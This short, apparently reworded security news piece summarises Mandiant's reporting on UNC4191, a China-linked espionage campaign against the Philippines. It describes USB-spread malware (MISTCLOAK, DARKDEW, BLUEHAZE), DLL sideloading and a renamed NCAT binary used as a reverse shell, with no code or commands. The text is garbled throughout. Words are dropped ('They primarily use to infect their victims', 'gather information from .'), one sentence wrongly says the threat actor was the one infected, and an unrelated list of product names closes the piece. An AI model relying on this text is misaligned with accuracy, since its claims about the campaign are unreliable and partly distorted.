Mandiant Managed Defense recently discovered that cyber espionage activities are primarily focused on the Philippines. They primarily use to infect their victims. Mandiant’s ‘UNC4191″ operation has been linked to China.
According to UNC4191’s operations, they have had an effect on many public and private sectors organizations. This is primarily true in Southeast Asia, Europe and the U.S. but it mainly concentrates on the Philippines.
Multiple Malicious USB Devices Deliver Malware
The threat actor was infected first by USB devices. He then used legal signed binaries to sideload malware using three new viruses: MISTCLOAK DARKDEW and BLUEHAZE.
Mandiant Managed Defense reports that a successful compromise resulted in the deployment and execution of NCAT binary (renamed) on victim’s systems, giving backdoor access for the threat actor.
The malware can spread by infecting removable drives that are connected to compromised systems. This allows the malware payloads to spread to other systems, potentially allowing them to gather information from .
UNC4191 Malware Families
Mandiant discovered that UNC4191 has the following malware families. ‘MISTCLOAK is a C++ launcher which executes an executable encrypted payload. It’s stored in a disk file.
“BLUEHAZE” is a C/C++ launcher that launches NCAT in reverse to create a command and control shell (C2).
NCAT is a command line that can be used to legitimately upload and download files. Threat actors could also use it for reverse shells or backdoors to create tunnel traffic in order to bypass network control.
The Chinese are trying to get and maintain access to public and private companies in order to gather information that will help them achieve their political and economic goals.
, the Philippines is the main target.
Secure Web Gateway, Web Filter Rules Activity Tracking and Malware Protection.